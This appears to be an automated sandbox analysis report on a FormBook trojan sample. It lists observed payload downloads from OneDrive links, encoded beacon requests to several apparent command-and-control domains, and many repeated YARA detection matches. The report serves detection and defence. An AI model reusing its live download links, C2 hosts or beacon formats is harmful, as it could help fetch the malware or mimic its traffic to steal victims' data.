Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: global trafficHTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: lValiHost: onedrive.live.com
            Source: global trafficHTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: Host: onedrive.live.comCookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; xidseq=1; wla42=
            Source: global trafficHTTP traffic detected: GET /y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1User-Agent: lValiHost: 2q5ira.ph.files.1drv.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1User-Agent: Host: 2q5ira.ph.files.1drv.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: lValiHost: onedrive.live.comCookie: wla42=
            Source: global trafficHTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: 6Host: onedrive.live.comCookie: wla42=; E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; xidseq=1
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1Host: www.meigsbuilds.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1Host: www.naturathome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1Host: www.nutricognition.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1Host: www.designgamagazine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1Host: www.kidsfundoor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1Host: www.empireapothecary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1Host: www.trendiddas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1Host: www.trisuaka.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1Host: www.nomaxdic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
            Source: Jwjxmakrv.exe, 00000008.00000002.323528611.00000000007FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: TR0627729920002.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
